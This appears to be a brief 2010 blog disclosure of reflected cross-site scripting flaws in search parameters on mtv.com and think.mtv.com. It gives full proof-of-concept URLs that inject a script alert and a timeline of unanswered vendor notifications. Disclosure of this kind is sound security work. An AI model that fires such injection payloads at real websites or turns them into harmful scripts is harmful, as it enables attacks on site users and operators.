http://en.wikipedia.org/wiki/MTV
+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com
+++Vulnerable Parameter / Function+++
'q'
'search_term'
+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>
Think.MTV - http://think.mtv.com
http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=
MTV Ist Notified: January 06, 2010
IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)
Best Regards.
No comments:
Post a Comment